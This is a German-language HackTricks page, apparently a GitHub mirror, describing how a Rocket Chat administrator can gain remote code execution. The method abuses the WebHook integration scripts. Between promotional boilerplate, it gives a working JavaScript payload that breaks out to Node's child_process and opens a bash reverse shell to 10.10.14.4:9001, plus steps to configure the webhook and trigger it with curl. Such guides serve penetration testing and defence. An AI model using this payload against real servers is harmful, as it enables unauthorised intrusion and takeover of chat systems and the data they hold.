mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
4.3 KiB
4.3 KiB
Rocket Chat
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.
{% embed url="https://websec.nl/" %}
RCE
Wenn Sie Administrator in Rocket Chat sind, können Sie RCE erhalten.
- Gehen Sie zu
Integrationsund wählen SieNeue Integrationund wählen Sie eine beliebige:Eingehender WebHookoderAusgehender WebHook. /admin/integrations/incoming
- Gemäß der Dokumentation verwenden beide ES2015 / ECMAScript 6 (im Grunde JavaScript), um die Daten zu verarbeiten. Also lassen Sie uns eine Rev-Shell für JavaScript wie folgt erhalten:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Konfiguriere den WebHook (der Kanal und der Beitrag als Benutzername müssen vorhanden sein):
- Konfiguriere das WebHook-Skript:
- Speichere die Änderungen
- Erhalte die generierte WebHook-URL:
- Rufe sie mit curl auf und du solltest die Reverse-Shell erhalten
{% embed url="https://websec.nl/" %}
Lerne AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn du deine Firma in HackTricks beworben sehen möchtest oder HackTricks als PDF herunterladen möchtest, überprüfe die ABONNEMENTPLÄNE!
- Hol dir das offizielle PEASS & HackTricks-Merch
- Entdecke The PEASS Family, unsere Sammlung exklusiver NFTs
- Trete der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @carlospolopm.
- Teile deine Hacking-Tricks, indem du PRs an die HackTricks und HackTricks Cloud Github-Repositories einreichst.